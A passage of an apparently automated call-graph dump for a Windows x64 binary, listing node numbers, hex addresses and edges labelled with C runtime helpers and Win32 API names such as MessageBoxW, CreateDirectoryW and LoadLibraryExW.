API calls 16523 7ff7102d38ca 16522->16523 16523->16461 16524->16522 16524->16523 16526 7ff7102d10a7 16525->16526 16527 7ff7102d10d6 16526->16527 16529 7ff7102d1193 16526->16529 16531 7ff7102d1113 16527->16531 16707 7ff7102cff48 16527->16707 16530 7ff7102d9b24 _invalid_parameter_noinfo 37 API calls 16529->16530 16530->16531 16531->16461 16533 7ff7102d0c97 16532->16533 16534 7ff7102d0cc6 16533->16534 16536 7ff7102d0d83 16533->16536 16535 7ff7102cff48 12 API calls 16534->16535 16538 7ff7102d0d03 16534->16538 16535->16538 16537 7ff7102d9b24 _invalid_parameter_noinfo 37 API calls 16536->16537 16537->16538 16538->16461 16540 7ff7102d3a0f 16539->16540 16542 7ff7102d3a13 __crtLCMapStringW 16540->16542 16715 7ff7102d3a68 16540->16715 16542->16461 16544 7ff7102d14b7 16543->16544 16545 7ff7102d14e6 16544->16545 16547 7ff7102d15a3 16544->16547 16546 7ff7102cff48 12 API calls 16545->16546 16549 7ff7102d1523 16545->16549 16546->16549 16548 7ff7102d9b24 _invalid_parameter_noinfo 37 API calls 16547->16548 16548->16549 16549->16461 16551 7ff7102d3af7 16550->16551 16719 7ff7102dccc8 16551->16719 16557 7ff7102ddd49 16556->16557 16566 7ff7102ddd57 16556->16566 16558 7ff7102ddd77 16557->16558 16559 7ff7102d3ae0 45 API calls 16557->16559 16557->16566 16560 7ff7102dddaf 16558->16560 16561 7ff7102ddd88 16558->16561 16559->16558 16563 7ff7102dde3a 16560->16563 16564 7ff7102dddd9 16560->16564 16560->16566 16765 7ff7102df3b0 16561->16765 16565 7ff7102debb0 _fread_nolock MultiByteToWideChar 16563->16565 16564->16566 16768 7ff7102debb0 16564->16768 16565->16566 16566->16464 16569 7ff7102cfed7 16568->16569 16575 7ff7102cfec6 16568->16575 16570 7ff7102dc90c _fread_nolock 12 API calls 16569->16570 16569->16575 16571 7ff7102cff04 16570->16571 16572 7ff7102cff18 16571->16572 16574 7ff7102d9c58 __free_lconv_num 11 API calls 16571->16574 16573 7ff7102d9c58 __free_lconv_num 11 API calls 16572->16573 16573->16575 16574->16572 16576 7ff7102dd880 16575->16576 16577 7ff7102dd8d0 16576->16577 16578 7ff7102dd89d 16576->16578 16577->16578 16580 7ff7102dd902 16577->16580 16579 7ff7102d9b24 _invalid_parameter_noinfo 37 API calls 16578->16579 16592 7ff7102d35c1 16579->16592 16582 7ff7102dda15 16580->16582 16590 7ff7102dd94a 16580->16590 16581 7ff7102ddb07 16631 7ff7102dcd6c 16581->16631 16582->16581 16584 7ff7102ddacd 16582->16584 16586 7ff7102dda9c 16582->16586 16587 7ff7102dda5f 16582->16587 16589 7ff7102dda55 16582->16589 16624 7ff7102dd104 16584->16624 16617 7ff7102dd3e4 16586->16617 16607 7ff7102dd614 16587->16607 16589->16584 16593 7ff7102dda5a 16589->16593 16590->16592 16598 7ff7102d97b4 16590->16598 16592->16511 16592->16512 16593->16586 16593->16587 16596 7ff7102d9c10 _isindst 17 API calls 16597 7ff7102ddb64 16596->16597 16599 7ff7102d97c1 16598->16599 16600 7ff7102d97cb 16598->16600 16599->16600 16605 7ff7102d97e6 16599->16605 16601 7ff7102d43f4 _get_daylight 11 API calls 16600->16601 16602 7ff7102d97d2 16601->16602 16640 7ff7102d9bf0 16602->16640 16604 7ff7102d97de 16604->16592 16604->16596 16605->16604 16606 7ff7102d43f4 _get_daylight 11 API calls 16605->16606 16606->16602 16643 7ff7102e33bc 16607->16643 16611 7ff7102dd6bc 16612 7ff7102dd6c0 16611->16612 16613 7ff7102dd711 16611->16613 16615 7ff7102dd6dc 16611->16615 16612->16592 16696 7ff7102dd200 16613->16696 16692 7ff7102dd4bc 16615->16692 16618 7ff7102e33bc 38 API calls 16617->16618 16619 7ff7102dd42e 16618->16619 16620 7ff7102e2e04 37 API calls 16619->16620 16621 7ff7102dd47e 16620->16621 16622 7ff7102dd482 16621->16622 16623 7ff7102dd4bc 45 API calls 16621->16623 16622->16592 16623->16622 16625 7ff7102e33bc 38 API calls 16624->16625 16626 7ff7102dd14f 16625->16626 16627 7ff7102e2e04 37 API calls 16626->16627 16628 7ff7102dd1a7 16627->16628 16629 7ff7102dd1ab 16628->16629 16630 7ff7102dd200 45 API calls 16628->16630 16629->16592 16630->16629 16632 7ff7102dcde4 16631->16632 16633 7ff7102dcdb1 16631->16633 16635 7ff7102dcdfc 16632->16635 16637 7ff7102dce7d 16632->16637 16634 7ff7102d9b24 _invalid_parameter_noinfo 37 API calls 16633->16634 16639 7ff7102dcddd memcpy_s 16634->16639 16636 7ff7102dd104 46 API calls 16635->16636 16636->16639 16638 7ff7102d3ae0 45 API calls 16637->16638 16637->16639 16638->16639 16639->16592 16641 7ff7102d9a88 _invalid_parameter_noinfo 37 API calls 16640->16641 16642 7ff7102d9c09 16641->16642 16642->16604 16644 7ff7102e340f fegetenv 16643->16644 16645 7ff7102e713c 37 API calls 16644->16645 16649 7ff7102e3462 16645->16649 16646 7ff7102e348f 16651 7ff7102d97b4 __std_exception_copy 37 API calls 16646->16651 16647 7ff7102e3552 16648 7ff7102e713c 37 API calls 16647->16648 16650 7ff7102e357c 16648->16650 16649->16647 16652 7ff7102e352c 16649->16652 16653 7ff7102e347d 16649->16653 16654 7ff7102e713c 37 API calls 16650->16654 16655 7ff7102e350d 16651->16655 16658 7ff7102d97b4 __std_exception_copy 37 API calls 16652->16658 16653->16646 16653->16647 16656 7ff7102e358d 16654->16656 16657 7ff7102e4634 16655->16657 16662 7ff7102e3515 16655->16662 16659 7ff7102e7330 20 API calls 16656->16659 16660 7ff7102d9c10 _isindst 17 API calls 16657->16660 16658->16655 16670 7ff7102e35f6 memcpy_s 16659->16670 16661 7ff7102e4649 16660->16661 16663 7ff7102cb870 _log10_special 8 API calls 16662->16663 16664 7ff7102dd661 16663->16664 16688 7ff7102e2e04 16664->16688 16665 7ff7102e399f memcpy_s 16666 7ff7102e3cdf 16667 7ff7102e2f20 37 API calls 16666->16667 16674 7ff7102e43f7 16667->16674 16668 7ff7102e3c8b 16668->16666 16671 7ff7102e464c memcpy_s 37 API calls 16668->16671 16669 7ff7102e3637 memcpy_s 16677 7ff7102e3a93 memcpy_s 16669->16677 16683 7ff7102e3f7b memcpy_s 16669->16683 16670->16665 16670->16669 16672 7ff7102d43f4 _get_daylight 11 API calls 16670->16672 16671->16666 16673 7ff7102e3a70 16672->16673 16675 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 16673->16675 16676 7ff7102e4452 16674->16676 16679 7ff7102e464c memcpy_s 37 API calls 16674->16679 16675->16669 16678 7ff7102e45d8 16676->16678 16684 7ff7102e2f20 37 API calls 16676->16684 16687 7ff7102e464c memcpy_s 37 API calls 16676->16687 16677->16668 16681 7ff7102d43f4 11 API calls _get_daylight 16677->16681 16686 7ff7102d9bf0 37 API calls _invalid_parameter_noinfo 16677->16686 16680 7ff7102e713c 37 API calls 16678->16680 16679->16676 16680->16662 16681->16677 16682 7ff7102d43f4 11 API calls _get_daylight 16682->16683 16683->16666 16683->16668 16683->16682 16685 7ff7102d9bf0 37 API calls _invalid_parameter_noinfo 16683->16685 16684->16676 16685->16683 16686->16677 16687->16676 16689 7ff7102e2e23 16688->16689 16690 7ff7102d9b24 _invalid_parameter_noinfo 37 API calls 16689->16690 16691 7ff7102e2e4e memcpy_s 16689->16691 16690->16691 16691->16611 16693 7ff7102dd4e8 memcpy_s 16692->16693 16694 7ff7102d3ae0 45 API calls 16693->16694 16695 7ff7102dd5a2 memcpy_s 16693->16695 16694->16695 16695->16612 16697 7ff7102dd23b 16696->16697 16700 7ff7102dd288 memcpy_s 16696->16700 16698 7ff7102d9b24 _invalid_parameter_noinfo 37 API calls 16697->16698 16699 7ff7102dd267 16698->16699 16699->16612 16700->16700 16701 7ff7102dd2f3 16700->16701 16703 7ff7102d3ae0 45 API calls 16700->16703 16702 7ff7102d97b4 __std_exception_copy 37 API calls 16701->16702 16706 7ff7102dd335 memcpy_s 16702->16706 16703->16701 16704 7ff7102d9c10 _isindst 17 API calls 16705 7ff7102dd3e0 16704->16705 16706->16704 16708 7ff7102cff7f 16707->16708 16709 7ff7102cff6e 16707->16709 16708->16709 16710 7ff7102dc90c _fread_nolock 12 API calls 16708->16710 16709->16531 16711 7ff7102cffb0 16710->16711 16712 7ff7102cffc4 16711->16712 16713 7ff7102d9c58 __free_lconv_num 11 API calls 16711->16713 16714 7ff7102d9c58 __free_lconv_num 11 API calls 16712->16714 16713->16712 16714->16709 16716 7ff7102d3a86 16715->16716 16717 7ff7102d3a8e 16715->16717 16718 7ff7102d3ae0 45 API calls 16716->16718 16717->16542 16718->16717 16720 7ff7102dcce1 16719->16720 16722 7ff7102d3b1f 16719->16722 16720->16722 16727 7ff7102e2614 16720->16727 16723 7ff7102dcd34 16722->16723 16724 7ff7102dcd4d 16723->16724 16726 7ff7102d3b2f 16723->16726 16724->16726 16762 7ff7102e1960 16724->16762 16726->16464 16739 7ff7102da460 GetLastError 16727->16739 16730 7ff7102e266e 16730->16722 16740 7ff7102da484 FlsGetValue 16739->16740 16741 7ff7102da4a1 FlsSetValue 16739->16741 16742 7ff7102da49b 16740->16742 16744 7ff7102da491 16740->16744 16743 7ff7102da4b3 16741->16743 16741->16744 16742->16741 16746 7ff7102ddea8 _get_daylight 11 API calls 16743->16746 16745 7ff7102da50d SetLastError 16744->16745 16747 7ff7102da52d 16745->16747 16748 7ff7102da51a 16745->16748 16749 7ff7102da4c2 16746->16749 16752 7ff7102d9814 __CxxCallCatchBlock 38 API calls 16747->16752 16748->16730 16761 7ff7102df5e8 EnterCriticalSection 16748->16761 16750 7ff7102da4e0 FlsSetValue 16749->16750 16751 7ff7102da4d0 FlsSetValue 16749->16751 16754 7ff7102da4ec FlsSetValue 16750->16754 16755 7ff7102da4fe 16750->16755 16753 7ff7102da4d9 16751->16753 16756 7ff7102da532 16752->16756 16757 7ff7102d9c58 __free_lconv_num 11 API calls 16753->16757 16754->16753 16758 7ff7102da204 _get_daylight 11 API calls 16755->16758 16757->16744 16759 7ff7102da506 16758->16759 16760 7ff7102d9c58 __free_lconv_num 11 API calls 16759->16760 16760->16745 16763 7ff7102da460 __CxxCallCatchBlock 45 API calls 16762->16763 16764 7ff7102e1969 16763->16764 16771 7ff7102e6098 16765->16771 16769 7ff7102debb9 MultiByteToWideChar 16768->16769 16774 7ff7102e60fc 16771->16774 16772 7ff7102cb870 _log10_special 8 API calls 16773 7ff7102df3cd 16772->16773 16773->16566 16774->16772 16776 7ff7102d032f 16775->16776 16777 7ff7102d031d 16775->16777 16779 7ff7102d033d 16776->16779 16783 7ff7102d0379 16776->16783 16778 7ff7102d43f4 _get_daylight 11 API calls 16777->16778 16780 7ff7102d0322 16778->16780 16781 7ff7102d9b24 _invalid_parameter_noinfo 37 API calls 16779->16781 16782 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 16780->16782 16790 7ff7102d032d 16781->16790 16782->16790 16784 7ff7102d06f5 16783->16784 16786 7ff7102d43f4 _get_daylight 11 API calls 16783->16786 16785 7ff7102d43f4 _get_daylight 11 API calls 16784->16785 16784->16790 16787 7ff7102d0989 16785->16787 16788 7ff7102d06ea 16786->16788 16791 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 16787->16791 16789 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 16788->16789 16789->16784 16790->16428 16791->16790 16793 7ff7102cfa24 16792->16793 16822 7ff7102cf784 16793->16822 16795 7ff7102cfa3d 16795->16047 16834 7ff7102cf6dc 16796->16834 16800 7ff7102c277c 16799->16800 16801 7ff7102d43f4 _get_daylight 11 API calls 16800->16801 16802 7ff7102c2799 16801->16802 16848 7ff7102d3ca4 16802->16848 16807 7ff7102c1bf0 49 API calls 16808 7ff7102c2807 16807->16808 16809 7ff7102c86b0 2 API calls 16808->16809 16810 7ff7102c281f 16809->16810 16811 7ff7102c2843 MessageBoxA 16810->16811 16812 7ff7102c282c MessageBoxW 16810->16812 16813 7ff7102c2855 16811->16813 16812->16813 16814 7ff7102cb870 _log10_special 8 API calls 16813->16814 16815 7ff7102c2865 16814->16815 16815->16076 16817 7ff7102c1b06 16816->16817 16818 7ff7102cf439 16816->16818 16817->16075 16817->16076 16819 7ff7102d43f4 _get_daylight 11 API calls 16818->16819 16820 7ff7102cf43e 16819->16820 16821 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 16820->16821 16821->16817 16823 7ff7102cf7ee 16822->16823 16824 7ff7102cf7ae 16822->16824 16823->16824 16826 7ff7102cf7fa 16823->16826 16825 7ff7102d9b24 _invalid_parameter_noinfo 37 API calls 16824->16825 16829 7ff7102cf7d5 16825->16829 16833 7ff7102d477c EnterCriticalSection 16826->16833 16829->16795 16835 7ff7102c19b9 16834->16835 16836 7ff7102cf706 16834->16836 16835->16053 16835->16055 16836->16835 16837 7ff7102cf715 memcpy_s 16836->16837 16838 7ff7102cf752 16836->16838 16840 7ff7102d43f4 _get_daylight 11 API calls 16837->16840 16847 7ff7102d477c EnterCriticalSection 16838->16847 16842 7ff7102cf72a 16840->16842 16844 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 16842->16844 16844->16835 16850 7ff7102d3cfe 16848->16850 16849 7ff7102d3d23 16851 7ff7102d9b24 _invalid_parameter_noinfo 37 API calls 16849->16851 16850->16849 16852 7ff7102d3d5f 16850->16852 16854 7ff7102d3d4d 16851->16854 16878 7ff7102d1f30 16852->16878 16857 7ff7102cb870 _log10_special 8 API calls 16854->16857 16855 7ff7102d3e3c 16856 7ff7102d9c58 __free_lconv_num 11 API calls 16855->16856 16856->16854 16858 7ff7102c27d8 16857->16858 16866 7ff7102d4480 16858->16866 16860 7ff7102d3e60 16860->16855 16864 7ff7102d3e6a 16860->16864 16861 7ff7102d3e11 16862 7ff7102d9c58 __free_lconv_num 11 API calls 16861->16862 16862->16854 16863 7ff7102d3e08 16863->16855 16863->16861 16865 7ff7102d9c58 __free_lconv_num 11 API calls 16864->16865 16865->16854 16867 7ff7102da5d8 _get_daylight 11 API calls 16866->16867 16868 7ff7102d4497 16867->16868 16869 7ff7102c27df 16868->16869 16870 7ff7102ddea8 _get_daylight 11 API calls 16868->16870 16872 7ff7102d44d7 16868->16872 16869->16807 16871 7ff7102d44cc 16870->16871 16873 7ff7102d9c58 __free_lconv_num 11 API calls 16871->16873 16872->16869 17016 7ff7102ddf30 16872->17016 16873->16872 16876 7ff7102d9c10 _isindst 17 API calls 16877 7ff7102d451c 16876->16877 16879 7ff7102d1f6e 16878->16879 16880 7ff7102d1f5e 16878->16880 16881 7ff7102d1f77 16879->16881 16888 7ff7102d1fa5 16879->16888 16883 7ff7102d9b24 _invalid_parameter_noinfo 37 API calls 16880->16883 16884 7ff7102d9b24 _invalid_parameter_noinfo 37 API calls 16881->16884 16882 7ff7102d1f9d 16882->16855 16882->16860 16882->16861 16882->16863 16883->16882 16884->16882 16885 7ff7102d3ae0 45 API calls 16885->16888 16887 7ff7102d2254 16890 7ff7102d9b24 _invalid_parameter_noinfo 37 API calls 16887->16890 16888->16880 16888->16882 16888->16885 16888->16887 16892 7ff7102d28c0 16888->16892 16918 7ff7102d2588 16888->16918 16948 7ff7102d1e10 16888->16948 16890->16880 16893 7ff7102d2975 16892->16893 16894 7ff7102d2902 16892->16894 16897 7ff7102d29cf 16893->16897 16898 7ff7102d297a 16893->16898 16895 7ff7102d299f 16894->16895 16896 7ff7102d2908 16894->16896 16965 7ff7102d0e70 16895->16965 16905 7ff7102d290d 16896->16905 16909 7ff7102d29de 16896->16909 16897->16895 16897->16909 16916 7ff7102d2938 16897->16916 16899 7ff7102d29af 16898->16899 16900 7ff7102d297c 16898->16900 16972 7ff7102d0a60 16899->16972 16902 7ff7102d291d 16900->16902 16908 7ff7102d298b 16900->16908 16917 7ff7102d2a0d 16902->16917 16951 7ff7102d3224 16902->16951 16905->16902 16907 7ff7102d2950 16905->16907 16905->16916 16907->16917 16961 7ff7102d36e0 16907->16961 16908->16895 16911 7ff7102d2990 16908->16911 16909->16917 16979 7ff7102d1280 16909->16979 16913 7ff7102d3878 37 API calls 16911->16913 16911->16917 16912 7ff7102cb870 _log10_special 8 API calls 16914 7ff7102d2ca3 16912->16914 16913->16916 16914->16888 16916->16917 16986 7ff7102ddb68 16916->16986 16917->16912 16919 7ff7102d2593 16918->16919 16920 7ff7102d25a9 16918->16920 16921 7ff7102d2975 16919->16921 16922 7ff7102d2902 16919->16922 16924 7ff7102d25e7 16919->16924 16923 7ff7102d9b24 _invalid_parameter_noinfo 37 API calls 16920->16923 16920->16924 16927 7ff7102d29cf 16921->16927 16928 7ff7102d297a 16921->16928 16925 7ff7102d299f 16922->16925 16926 7ff7102d2908 16922->16926 16923->16924 16924->16888 16931 7ff7102d0e70 38 API calls 16925->16931 16935 7ff7102d290d 16926->16935 16937 7ff7102d29de 16926->16937 16927->16925 16927->16937 16946 7ff7102d2938 16927->16946 16929 7ff7102d29af 16928->16929 16930 7ff7102d297c 16928->16930 16933 7ff7102d0a60 38 API calls 16929->16933 16932 7ff7102d291d 16930->16932 16939 7ff7102d298b 16930->16939 16931->16946 16934 7ff7102d3224 47 API calls 16932->16934 16947 7ff7102d2a0d 16932->16947 16933->16946 16934->16946 16935->16932 16936 7ff7102d2950 16935->16936 16935->16946 16940 7ff7102d36e0 47 API calls 16936->16940 16936->16947 16938 7ff7102d1280 38 API calls 16937->16938 16937->16947 16938->16946 16939->16925 16941 7ff7102d2990 16939->16941 16940->16946 16943 7ff7102d3878 37 API calls 16941->16943 16941->16947 16942 7ff7102cb870 _log10_special 8 API calls 16944 7ff7102d2ca3 16942->16944 16943->16946 16944->16888 16945 7ff7102ddb68 47 API calls 16945->16946 16946->16945 16946->16947 16947->16942 16999 7ff7102d0034 16948->16999 16952 7ff7102d3246 16951->16952 16953 7ff7102cfea0 12 API calls 16952->16953 16954 7ff7102d328e 16953->16954 16955 7ff7102dd880 46 API calls 16954->16955 16956 7ff7102d3361 16955->16956 16957 7ff7102d3ae0 45 API calls 16956->16957 16958 7ff7102d3383 16956->16958 16957->16958 16959 7ff7102d3ae0 45 API calls 16958->16959 16960 7ff7102d340c 16958->16960 16959->16960 16960->16916 16962 7ff7102d36f8 16961->16962 16964 7ff7102d3760 16961->16964 16963 7ff7102ddb68 47 API calls 16962->16963 16962->16964 16963->16964 16964->16916 16966 7ff7102d0ea3 16965->16966 16967 7ff7102d0ed2 16966->16967 16969 7ff7102d0f8f 16966->16969 16968 7ff7102cfea0 12 API calls 16967->16968 16971 7ff7102d0f0f 16967->16971 16968->16971 16970 7ff7102d9b24 _invalid_parameter_noinfo 37 API calls 16969->16970 16970->16971 16971->16916 16974 7ff7102d0a93 16972->16974 16973 7ff7102d0ac2 16975 7ff7102cfea0 12 API calls 16973->16975 16978 7ff7102d0aff 16973->16978 16974->16973 16976 7ff7102d0b7f 16974->16976 16975->16978 16977 7ff7102d9b24 _invalid_parameter_noinfo 37 API calls 16976->16977 16977->16978 16978->16916 16981 7ff7102d12b3 16979->16981 16980 7ff7102d12e2 16982 7ff7102cfea0 12 API calls 16980->16982 16985 7ff7102d131f 16980->16985 16981->16980 16983 7ff7102d139f 16981->16983 16982->16985 16984 7ff7102d9b24 _invalid_parameter_noinfo 37 API calls 16983->16984 16984->16985 16985->16916 16989 7ff7102ddb90 16986->16989 16987 7ff7102ddbbe memcpy_s 16991 7ff7102d9b24 _invalid_parameter_noinfo 37 API calls 16987->16991 16992 7ff7102ddb95 memcpy_s 16987->16992 16988 7ff7102ddbd5 16988->16987 16988->16992 16996 7ff7102dfaf8 16988->16996 16989->16987 16989->16988 16990 7ff7102d3ae0 45 API calls 16989->16990 16989->16992 16990->16988 16991->16992 16992->16916 16997 7ff7102dfb1c WideCharToMultiByte 16996->16997 17000 7ff7102d0073 16999->17000 17001 7ff7102d0061 16999->17001 17004 7ff7102d0080 17000->17004 17007 7ff7102d00bd 17000->17007 17002 7ff7102d43f4 _get_daylight 11 API calls 17001->17002 17003 7ff7102d0066 17002->17003 17005 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 17003->17005 17006 7ff7102d9b24 _invalid_parameter_noinfo 37 API calls 17004->17006 17012 7ff7102d0071 17005->17012 17006->17012 17008 7ff7102d0166 17007->17008 17010 7ff7102d43f4 _get_daylight 11 API calls 17007->17010 17009 7ff7102d43f4 _get_daylight 11 API calls 17008->17009 17008->17012 17011 7ff7102d0210 17009->17011 17013 7ff7102d015b 17010->17013 17015 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 17011->17015 17012->16888 17014 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 17013->17014 17014->17008 17015->17012 17020 7ff7102ddf4d 17016->17020 17017 7ff7102ddf52 17018 7ff7102d44fd 17017->17018 17019 7ff7102d43f4 _get_daylight 11 API calls 17017->17019 17018->16869 17018->16876 17021 7ff7102ddf5c 17019->17021 17020->17017 17020->17018 17023 7ff7102ddf9c 17020->17023 17022 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 17021->17022 17022->17018 17023->17018 17024 7ff7102d43f4 _get_daylight 11 API calls 17023->17024 17024->17021 17026 7ff7102d7555 17025->17026 17027 7ff7102d7568 17025->17027 17028 7ff7102d43f4 _get_daylight 11 API calls 17026->17028 17035 7ff7102d71cc 17027->17035 17030 7ff7102d755a 17028->17030 17032 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 17030->17032 17033 7ff7102d7566 17032->17033 17033->16094 17042 7ff7102df5e8 EnterCriticalSection 17035->17042 17044 7ff7102c7b91 GetTokenInformation 17043->17044 17045 7ff7102c7c13 __vcrt_freefls 17043->17045 17046 7ff7102c7bb2 GetLastError 17044->17046 17049 7ff7102c7bbd 17044->17049 17047 7ff7102c7c26 CloseHandle 17045->17047 17048 7ff7102c7c2c 17045->17048 17046->17045 17046->17049 17047->17048 17048->16103 17049->17045 17050 7ff7102c7bd9 GetTokenInformation 17049->17050 17050->17045 17051 7ff7102c7bfc 17050->17051 17051->17045 17052 7ff7102c7c06 ConvertSidToStringSidW 17051->17052 17052->17045 17054 7ff7102c297a 17053->17054 17338 7ff7102c3f70 108 API calls 17337->17338 17339 7ff7102c1463 17338->17339 17340 7ff7102c148c 17339->17340 17341 7ff7102c146b 17339->17341 17343 7ff7102cf9f4 73 API calls 17340->17343 17342 7ff7102c25f0 53 API calls 17341->17342 17344 7ff7102c147b 17342->17344 17345 7ff7102c14a1 17343->17345 17344->16162 17346 7ff7102c14c1 17345->17346 17347 7ff7102c14a5 17345->17347 17349 7ff7102c14f1 17346->17349 17350 7ff7102c14d1 17346->17350 17348 7ff7102c2760 53 API calls 17347->17348 17356 7ff7102c14bc __vcrt_freefls 17348->17356 17353 7ff7102c14f7 17349->17353 17358 7ff7102c150a 17349->17358 17351 7ff7102c2760 53 API calls 17350->17351 17351->17356 17352 7ff7102cf36c 74 API calls 17354 7ff7102c1584 17352->17354 17361 7ff7102c11f0 17353->17361 17354->16162 17356->17352 17357 7ff7102cf6bc _fread_nolock 53 API calls 17357->17358 17358->17356 17358->17357 17359 7ff7102c1596 17358->17359 17360 7ff7102c2760 53 API calls 17359->17360 17360->17356 17362 7ff7102c1248 17361->17362 17363 7ff7102c124f 17362->17363 17364 7ff7102c1277 17362->17364 17365 7ff7102c25f0 53 API calls 17363->17365 17367 7ff7102c1291 17364->17367 17368 7ff7102c12ad 17364->17368 17366 7ff7102c1262 17365->17366 17366->17356 17369 7ff7102c2760 53 API calls 17367->17369 17370 7ff7102c12bf 17368->17370 17375 7ff7102c12db memcpy_s 17368->17375 17374 7ff7102c12a8 __vcrt_freefls 17369->17374 17371 7ff7102c2760 53 API calls 17370->17371 17371->17374 17374->17356 17375->17374 17399 7ff7102c3f1a 17398->17399 17400 7ff7102c86b0 2 API calls 17399->17400 17401 7ff7102c3f3f 17400->17401 17402 7ff7102cb870 _log10_special 8 API calls 17401->17402 17403 7ff7102c3f67 17402->17403 17403->16181 17406 7ff7102c753e 17404->17406 17405 7ff7102c7662 17408 7ff7102cb870 _log10_special 8 API calls 17405->17408 17406->17405 17407 7ff7102c1bf0 49 API calls 17406->17407 17412 7ff7102c75c5 17407->17412 17409 7ff7102c7693 17408->17409 17409->16181 17410 7ff7102c1bf0 49 API calls 17410->17412 17411 7ff7102c3f10 10 API calls 17411->17412 17412->17405 17412->17410 17412->17411 17413 7ff7102c761b 17412->17413 17414 7ff7102c86b0 2 API calls 17413->17414 17415 7ff7102c7633 CreateDirectoryW 17414->17415 17415->17405 17415->17412 17417 7ff7102c15d3 17416->17417 17418 7ff7102c15f7 17416->17418 17505 7ff7102c1050 17417->17505 17420 7ff7102c3f70 108 API calls 17418->17420 17422 7ff7102c160b 17420->17422 17421 7ff7102c15d8 17423 7ff7102c15ee 17421->17423 17426 7ff7102c25f0 53 API calls 17421->17426 17424 7ff7102c1613 17422->17424 17425 7ff7102c163b 17422->17425 17423->16181 17427 7ff7102c2760 53 API calls 17424->17427 17428 7ff7102c3f70 108 API calls 17425->17428 17426->17423 17430 7ff7102c162a 17427->17430 17429 7ff7102c164f 17428->17429 17431 7ff7102c1671 17429->17431 17432 7ff7102c1657 17429->17432 17430->16181 17434 7ff7102cf9f4 73 API calls 17431->17434 17433 7ff7102c25f0 53 API calls 17432->17433 17435 7ff7102c1667 17433->17435 17436 7ff7102c1686 17434->17436 17455 7ff7102c694b 17454->17455 17457 7ff7102c6904 17454->17457 17455->16181 17457->17455 17544 7ff7102d4250 17457->17544 17459 7ff7102c3b51 17458->17459 17460 7ff7102c3e90 49 API calls 17459->17460 17461 7ff7102c3b8b 17460->17461 17462 7ff7102c3e90 49 API calls 17461->17462 17463 7ff7102c3b9b 17462->17463 17464 7ff7102c3bbd 17463->17464 17465 7ff7102c3bec 17463->17465 17575 7ff7102c3ac0 17464->17575 17467 7ff7102c3ac0 51 API calls 17465->17467 17468 7ff7102c3bea 17467->17468 17503 7ff7102c1bf0 49 API calls 17502->17503 17504 7ff7102c3e24 17503->17504 17504->16181 17506 7ff7102c3f70 108 API calls 17505->17506 17507 7ff7102c108b 17506->17507 17508 7ff7102c1093 17507->17508 17509 7ff7102c10a8 17507->17509 17510 7ff7102c25f0 53 API calls 17508->17510 17511 7ff7102cf9f4 73 API calls 17509->17511 17516 7ff7102c10a3 __vcrt_freefls 17510->17516 17512 7ff7102c10bd 17511->17512 17513 7ff7102c10c1 17512->17513 17514 7ff7102c10dd 17512->17514 17516->17421 17545 7ff7102d425d 17544->17545 17546 7ff7102d428a 17544->17546 17548 7ff7102d43f4 _get_daylight 11 API calls 17545->17548 17549 7ff7102d4214 17545->17549 17547 7ff7102d42ad 17546->17547 17551 7ff7102d42c9 17546->17551 17550 7ff7102d43f4 _get_daylight 11 API calls 17547->17550 17552 7ff7102d4267 17548->17552 17549->17457 17553 7ff7102d42b2 17550->17553 17559 7ff7102d4178 17551->17559 17555 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 17552->17555 17556 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 17553->17556 17557 7ff7102d4272 17555->17557 17558 7ff7102d42bd 17556->17558 17557->17457 17558->17457 17560 7ff7102d419c 17559->17560 17561 7ff7102d4197 17559->17561 17560->17561 17562 7ff7102da460 __CxxCallCatchBlock 45 API calls 17560->17562 17561->17558 17563 7ff7102d41b7 17562->17563 17567 7ff7102dcc94 17563->17567 17576 7ff7102c3ae6 17575->17576 17639 7ff7102cbe12 RtlLookupFunctionEntry 17638->17639 17640 7ff7102cbc2b 17639->17640 17641 7ff7102cbe28 RtlVirtualUnwind 17639->17641 17642 7ff7102cbbc0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17640->17642 17641->17639 17641->17640 17644 7ff7102d51d8 17643->17644 17645 7ff7102d51fe 17644->17645 17648 7ff7102d5231 17644->17648 17646 7ff7102d43f4 _get_daylight 11 API calls 17645->17646 17647 7ff7102d5203 17646->17647 17651 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 17647->17651 17649 7ff7102d5244 17648->17649 17650 7ff7102d5237 17648->17650 17662 7ff7102d9f38 17649->17662 17652 7ff7102d43f4 _get_daylight 11 API calls 17650->17652 17655 7ff7102c3fc6 17651->17655 17652->17655 17655->16223 17675 7ff7102df5e8 EnterCriticalSection 17662->17675 18035 7ff7102d6c08 18034->18035 18038 7ff7102d66e4 18035->18038 18037 7ff7102d6c21 18037->16233 18039 7ff7102d66ff 18038->18039 18040 7ff7102d672e 18038->18040 18041 7ff7102d9b24 _invalid_parameter_noinfo 37 API calls 18039->18041 18048 7ff7102d477c EnterCriticalSection 18040->18048 18043 7ff7102d671f 18041->18043 18043->18037 18050 7ff7102cf163 18049->18050 18051 7ff7102cf191 18049->18051 18052 7ff7102d9b24 _invalid_parameter_noinfo 37 API calls 18050->18052 18054 7ff7102cf183 18051->18054 18059 7ff7102d477c EnterCriticalSection 18051->18059 18052->18054 18054->16237 18061 7ff7102c86b0 2 API calls 18060->18061 18062 7ff7102c81b4 LoadLibraryExW 18061->18062 18063 7ff7102c81d3 __vcrt_freefls 18062->18063 18063->16267 18065 7ff7102c6ef3 GetProcAddress 18064->18065 18066 7ff7102c6ec9 18064->18066 18065->18066 18067 7ff7102c6f18 GetProcAddress 18065->18067 18068 7ff7102c29e0 51 API calls 18066->18068 18067->18066 18069 7ff7102c6f3d GetProcAddress 18067->18069 18071 7ff7102c6ee3 18068->18071 18069->18066 18071->16274 18130 7ff7102c5b05 18129->18130 18131 7ff7102c1bf0 49 API calls 18130->18131 18132 7ff7102c5b41 18131->18132 18133 7ff7102c5b4a 18132->18133 18134 7ff7102c5b6d 18132->18134 18135 7ff7102c25f0 53 API calls 18133->18135 18136 